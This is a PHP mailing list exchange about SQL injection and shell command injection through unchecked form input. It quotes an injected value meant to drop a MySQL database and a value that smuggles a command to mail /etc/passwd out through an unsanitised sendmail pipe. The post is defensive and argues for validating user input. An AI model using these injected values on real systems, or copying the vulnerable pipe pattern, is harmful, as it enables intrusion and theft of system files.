> >2. Please enter your age: 25; drop database mysql > > > >Does this actually work? > [...] > >So I decided I had to test this: I wrote the code exactly as in the > >example; I provided the exact dangerous input (well, to be honest, I > >tried a select instead of drop mysql). When I tried it, the presumably > >dangerous situation degraded into a trivial MySQL error. It went > >something like "You have an error near '; select 1+1'". > > I've done something similar in the past just for kicks, and I got the same > result you did (i.e. an error). I believe this is because mysql_query() > expects ONE query at a time and will break if you send two or more. I > could be completely and totally wrong about that, though (someone please > correct me if I am)...
Maybe this one failed, but it's always a good idea to check user input. Let's say you're emailing a form and you don't use the mail() function, but make a call directly to sendmail... and you're sloppy... so you do this: $fp = fopen("|/usr/bin/sendmail $sendto"); #write stuff to pipe to send email... Now... what if when I filled out the form I set $sendto equal to this: [EMAIL PROTECTED]; /usr/bin/mail [EMAIL PROTECTED] < /etc/passwd You're form will still work, but I'll also get your password file... This used to happen *a lot* back in the early CGI days... This is why they recommend checking all user input and initializing variables... -philip -- PHP General Mailing List (http://www.php.net/) To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] To contact the list administrators, e-mail: [EMAIL PROTECTED]